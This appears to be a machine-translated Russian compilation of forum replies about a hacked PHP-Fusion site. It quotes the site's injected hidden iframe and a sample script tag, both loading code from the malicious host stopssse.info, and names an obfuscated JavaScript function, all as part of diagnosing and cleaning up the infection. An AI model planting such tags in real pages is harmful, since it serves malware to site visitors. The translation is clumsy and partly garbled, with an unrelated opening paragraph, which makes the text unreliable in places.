Это также достойно рассмотрения, что Системный администратор принесет опыт и знания, который не будет иметь большинство разработчиков. Они будут знать, как сети работают, как получить все возможное от баз данных, как подать заявки масштабироваться. Они имеют тенденцию иметь немного отличающееся мышление большинству разработчиков, и то знание может быть неоценимым.
Я нашел это в сгенерированном источнике
<iframe height="0" width="0" src="http://stopssse.info/l.php?thx" style="display: none; visibility: hidden;">
Это было правильно ниже тега основного текста, это не находится в фактическом источнике страницы, это добавляется запутываемым JavaScript
править: если Вы посмотрите в нижней части http://www.kennelsoffie.dk/includes/jscript.js, то Вы будете видеть, что действительно нечетное смотрит функция JavaScript. Это - запутываемая функция JavaScript, о которой я говорил Вам. Это запускается с
function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var
Лучший выбор состоит в том, чтобы найти и удалить его.
Ваш по всей вероятности имеют дело с нападениями на XSS.
В этом случае, два шага:
Вредоносное программное обеспечение не могло бы быть на сайте, но могло бы прибывать из материала, введенного из внешних источников, таких как рекламные объявления.
Если сайт был "заражен" с помощью сценариев перекрестного сайта, то то, что Вы имеете, является, вероятно, отправленным пользователями комментарием где-нибудь, который содержит что-то вроде этого:
<SCRIPT SRC="http://stopssse.info/malware.js"></SCRIPT>
Но обратите внимание, что существует много изменений, которые пытаются скрыть то, что выполняется внешний сценарий, и который может также изменить исходный URL, заставив Ваш поиск простой строки перестать работать.
Версия PHP-Fusion, это работает на сайте, кажется, v6.01.3, который надеется быть довольно старой версией, таким образом, это, вероятно, была бы хорошая идея обновить это.
Кажется, было довольно много консультаций безопасности для PHP-Fusion, включая многие проблемы Внедрений SQL.
Полный список консультаций для PHP-Fusion здесь: http://secunia.com/advisories/product/5291/?task=advisories
Ищите любые специфические файлы в фактических каталогах. Может быть файл, который был загружен через небезопасную форму загрузки, которая пишет дополнительные данные в вывод. Скажите Вашему другу изменять свои сведения об учетной записи и начинать рассматривать безопасность своего сайта.
В общем случае, ища запутал javascrot, этот инструмент часто полезен: Wepawet